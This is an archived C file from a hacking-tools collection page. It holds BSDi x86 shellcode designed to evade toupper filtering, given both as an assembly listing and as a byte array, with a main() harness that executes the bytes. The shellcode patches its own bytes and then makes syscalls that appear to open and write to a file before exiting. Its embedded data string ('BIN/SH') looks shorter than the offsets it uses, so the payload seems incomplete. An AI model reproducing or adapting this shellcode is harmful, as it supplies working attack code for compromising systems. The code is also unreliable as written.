home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hack.co.za / shellcode / bsdi / toupper_evasion.c < prev   
Encoding:
C/C++ Source or Header  |  2000-08-28  |  1.3 KB  |  60 lines
  1. /*
  2.     BSDi shellcode
  3.  
  4.     jmp    0x57
  5.     pop    %esi
  6.     xor    %ebx,%ebx
  7.     add    $0x8,%ebx
  8.     add    $0x2,%ebx
  9.     mov    %bl,0x26(%esi)
  10.     xor    %ebx,%ebx
  11.     add    $0x23,%ebx
  12.     add    $0x23,%ebx
  13.     mov    %bl,0xffffffa8(%esi)
  14.     xor    %ebx,%ebx
  15.     add    $0x26,%ebx
  16.     add    $0x30,%ebx
  17.     mov    %bl,0xffffffc2(%esi)
  18.     xor    %eax,%eax
  19.     mov    %al,0xb(%esi)
  20.     mov    %esi,%ebx
  21.     add    $0x5,%eax
  22.     xor    %ecx,%ecx
  23.     add    $0x1,%ecx
  24.     xor    %edx,%edx
  25.     int    $0x80
  26.     mov    %eax,%ebx
  27.     xor    %eax,%eax
  28.     add    $0x4,%eax
  29.     xor    %edx,%edx
  30.     mov    %dl,0x27(%esi)
  31.     mov    %esi,%ecx
  32.     add    $0xc,%ecx
  33.     add    $0x1b,%edx
  34.     int    $0x80
  35.     xor    %eax,%eax
  36.     add    $0x6,%eax
  37.     int    $0x80
  38.     xor    %eax,%eax
  39.     add    $0x1,%eax
  40.     int    $0x80
  41.     .string    "BIN/SH"
  42. */
  43.  
  44. char code[] =
  45.   "\xeb\x57\x5e\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e"
  46.   "\x26\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8\x31"
  47.   "\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2\x31\xc0\x88"
  48.   "\x46\x0b\x89\xf3\x83\xc0\x05\x31\xc9\x83\xc1\x01\x31"
  49.   "\xd2\xcd\x80\x89\xc3\x31\xc0\x83\xc0\x04\x31\xd2\x88"
  50.   "\x56\x27\x89\xf1\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31"
  51.   "\xc0\x83\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
  52.   "BIN/SH";
  53.  
  54. main()
  55. {
  56.   int (*f)();
  57.   f = (int (*)()) code;
  58.   printf("BSDi old shellcode, %d bytes\n", strlen(code));
  59.   (int)(*f)();
  60. }